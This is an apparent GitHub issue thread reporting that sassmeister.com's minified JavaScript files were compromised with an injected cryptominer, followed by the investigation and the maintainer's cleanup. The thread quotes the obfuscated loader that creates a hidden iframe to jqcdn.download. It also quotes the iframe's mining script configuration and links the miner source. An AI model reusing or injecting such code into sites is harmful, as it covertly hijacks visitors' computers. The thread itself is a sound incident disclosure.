Infected Website JS Script

[flexchar]

Came across your website loading heavy iframe from jqcdn.download domain. It looks like crypto miner thou not sure.

The init code sits at the very end of your app-{hash}.min.js file.

var _0xb185d4 = ["iframe", "setAttribute", "https://www.jqcdn.download/lot.html", "head", "appendChild", "1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1", "start", "createElement"];
!function(t, x) {
    !function(x) {
        for (; --x; )
            t.push(t.shift())
    }(++x)
}(_0xb185d4, 367);
var _0xe799c5 = function(t, x) {
    var a = _0xb185d4[t -= 0];
    return a
};
a = document[_0xe799c5("0x0")](_0xe799c5("0x1")),
a[_0xe799c5("0x2")]("src", _0xe799c5("0x3")),
a.style.width = "0px",
a.style.height = "1px",
document[_0xe799c5("0x4")][_0xe799c5("0x5")](a);

Then the iframe loads content from jqcdn.download/lot.html

<script src="https://www.jqcdn.download/ricewithchicken.js"></script>
<script>
  AsianRice.CONFIG.WEBSOCKET_SHARDS = [["wss://www.jqcdn.download:8893/proxy"]];
  var TexasChicken = new AsianRice.Anonymous("winner winner chicken dinner");
  TexasChicken.start();
</script>

For curiosity: The contents of ricewithchicken.js: https://pastebin.com/raw/JR7DHCeG And after base64 decryption here: https://pastebin.com/0kv9VWD5

Please take actions to clean up, or if it is done on purpose, inform your users.

[Wadeck]

After investigation about this problem, I discovered that the code inside this repository is "clean". The code is injected after the gulp process is done. To be sure I installed the package locally and did not find any trace of injected code.

But, if you reach the cdn and download the different files there, you will see that the following:

var _0x450c33=["iframe",...
var _0x659c05=["iframe",...
...

is injected into all *.js files, and this happened after the minification as this code is not touched.

@jedfoster can you give us more information about this security vulnerability ?

From my PoV, the admin did not wanted to add this code as it's injected everywhere. If (s)he wanted to keep it hidden he would have used some base64 encoding and injected only in the app-<hash>.min.js. It seems more likely to be an automatic attack.

[jedfoster]

I have no idea what’s going on here. I can state unequivocally that this script is not being loaded intentionally.

I’m away from my laptop right now and am unable to investigate further, but will as soon as I can.

Just as a sanity check, can you please verify and post here which sassmeister.com URLs this script is loading on? www.sassmeister.com (root URL) or www.sassmeister.com/gist/{gistId} . Considering the site loads Github gists, it’s possible for someone to load third-party scripts on a gist page.

[Wadeck]

@jedfoster as you shutdown the application I was not able to download any script right now. But when I did the investigation, I checked the scripts served by your server and not the gist itself. It's the app-f32392c07e.min.js directly that was changed. I followed the paths and download them directly from the CDN you're using.

Here are the files I downloaded from the CDN in the JS directory (transformed into .txt to be accepted as upload): app.min.js.txt app.js.txt embed-804a464ae4.js.txt app-f32392c07e.js.txt embed.js.txt

As you can see, the injected JS is always at the end of the files, for all of them.

Thank you for the quick answer, this is really annoying as a user and I hope you will not loose too many frequent users due to this attack.

[jedfoster]

Ok. I have nuked the offending code, found and patched the security hole those motherf*ckers took advantage of, built a new S3 bucket for the assets to serve from, and rebuilt and redeployed the app. sassmeister.com should be good as new.

I feel awful that this issue has been sitting open for 3 weeks! Don't know why, but I didn't see it until today. I'm angry at the motherf*ckers who took advantage of a security hole and then took advantage of my users. But I'm even angrier at myself for leaving such a stupid hole open in the first place.

@Wadeck I am incredibly grateful to you for reaching out on Twitter. Thank you!

@flexchar I am so sorry I didn't see this when you reported it. I will keep a closer eye on my GitHub issues going forward.